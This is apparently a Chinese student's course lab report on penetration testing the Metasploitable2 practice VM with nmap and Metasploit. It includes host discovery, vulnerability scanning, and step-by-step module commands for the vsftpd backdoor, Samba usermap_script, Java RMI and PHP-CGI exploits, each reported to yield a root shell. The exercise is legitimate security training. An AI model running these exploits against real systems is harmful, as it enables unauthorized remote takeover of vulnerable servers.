20232423 2025-2026-1《网络与系统攻防技术》实验六实验报告

1.实验内容
下载官方靶机Metasploitable2,完成下面实验内容。
(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
2.实验目的
通过端口扫描发现靶机漏洞,掌握metasploit的用法,实现多种漏洞的渗透利用。
3.实验环境
安装Kali镜像VMware虚拟机以及Metasploitable2虚拟机
4.实验过程与分析
    4.1 前期渗透
    4.1.1 主机发现
查看靶机的IP地址
image

在kali虚拟机中打开msfconsole,执行ARP扫描,依次输入命令:
search arp_sweep
use 0 
set RHOSTS 192.168.239.0/24 
Run
image

由图可知,靶机处于在线状态,标识为VMware, Inc.
4.1.2 端口扫描
使用nmap进行端口扫描,输入命令nmap -sS -sV 192.168.239.145进行SYN扫描
image

可以看到靶机开放了大量端口,存在漏洞
4.1.3 漏洞扫描
输入nmap -script=vuln 192.168.239.145对靶机进行漏洞扫描。
image

vsFTPd 2.3.4 版本(对应 CVE-2011-2523)存在 FTP 服务 21 端口后门漏洞,该漏洞于 2011 年 7 月 3 日披露、7 月 4 日被报道。检测结果显示 “Shell command: id” 及 “Results: uid=0 (root) gid=0 (root)”,表明攻击者可通过该后门直接获取 root 权限。
image

25 端口存在多个漏洞:一是 SSL-Poodle 漏洞(CVE-2014-3566),因 SSL 协议 CBC 填充特性,中间人可通过填充预言机攻击获取明文;二是 ssl-dh-params 漏洞,匿名 DH 密钥交换仅防被动窃听,易遭主动中间人攻击;三是 Logjam 漏洞(CVE-2015-4000),TLS 处理 DHE_EXPORT 密钥交换存在缺陷,会被降级到 512 位弱加密。
image

80 端口存在两个漏洞:1. Slowloris 漏洞(CVE-2007-6750),状态为 LIKELY VULNERABLE,属 DoS 攻击类,通过大量半打开连接耗尽服务器资源;2. HTTP SQL 注入漏洞,多个 URL 被检测出存在注入风险。
image

1099端口上的漏洞为RMI注册表默认配置远程代码执行漏洞,RMI注册表默认配置允许从远程URL加载类,这会导致远程代码执行。
image

5432 端口存在三个漏洞:1. SSL/TLS 中间人漏洞(CVE-2014-0224,ssl-ccs-injection),OpenSSL 处理相关消息有缺陷,中间人可触发零长度主密钥,劫持会话或窃取敏感信息;2. SSL 信息泄露漏洞(CVE-2014-3566,ssl-poodle),SSL3.0 协议 CBC 填充特性导致中间人可获取明文数据;3. Diffie-Hellman 密钥交换漏洞(ssl-dh-params),因密钥组强度不足,TLS 服务易遭被动窃听。
image

对于6667端口的IRC服务存在UnrealIRCd后门。该漏洞使得攻击者可以直接获取系统权限。
image

4.2 Vsftpd源码包后门漏洞(21端口)
输入命令nmap -sV -p 21 192.168.239.145扫描靶机的21端口,该端口开放,且运行的是vsftpd 2.3.4
image

输入命令:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.239.145
Run
image

可以获得shell
4.3 SambaMS-RPC Shell命令注入漏洞(端口139)
输入命令nmap -p 139 192.168.239.145扫描靶机的139端口,查看该端口是否开放。
image

输入命令:
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.239.145
Run
image
image

利用Samba服务的usermap_script漏洞可以获得靶机的shell.
4.4 Java RMI SERVER命令执行漏洞(1099端口)
输入命令nmap -p 1099 192.168.239.145扫描靶机的1099端口,查看该端口是否开放。
image

输入命令:
use exploit/multi/misc/java_rmi_server
set RHOSTS 192.168.239.145
Run
image

Java RMI 服务存在远程代码执行漏洞,利用该漏洞可获取靶机的 Meterpreter 会话;输入 shell 命令切换至交互式 Shell 后,能够查看目标主机完整系统信息、当前路径及目录文件,且经核查当前登录用户为 root 用户。
4.5 PHP CGI参数执行注入漏洞(80端口)
输入命令nmap -p 80 192.168.239.145扫描靶机的80端口,查看该端口是否开放。
image

输入命令:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.239.145
Run
image

PHP-CGI 参数注入漏洞可被利用获取靶机的 Meterpreter 会话;输入 shell 命令切换至交互式 Shell 后,能够查看目标主机完整系统信息、当前路径及目录文件,经核查当前登录用户为 root 用户。
5.问题及解决
整体实验较顺利,没有什么问题
6.心得体会
本次实验聚焦 Metasploit 攻击渗透实践,学习了主机发现、端口扫描、漏洞扫描的基本流程,以及利用 msf 框架对部分端口漏洞进行渗透的方法,让我对 Metasploit 渗透有了初步了解。
实验过程十分顺利,靶机安装便捷且所需环境已提前配置完成。不同端口的攻击模块虽有差异,但核心逻辑一致,均遵循 “模块调用 — 参数配置 — 攻击执行” 的固定模式。
实验操作本身并不复杂,但我意识到需要在原理理解上多下功夫。之前的实验中,我有时过于依赖教程、仅按步骤完成任务,缺乏独立思考。后续会在完成系列实验后梳理所学,深化对每步操作背后逻辑的认知,力求获得更多收获。

posted @ 2025-11-20 17:10  不识愁滋味£  阅读(2)  评论(0)    收藏  举报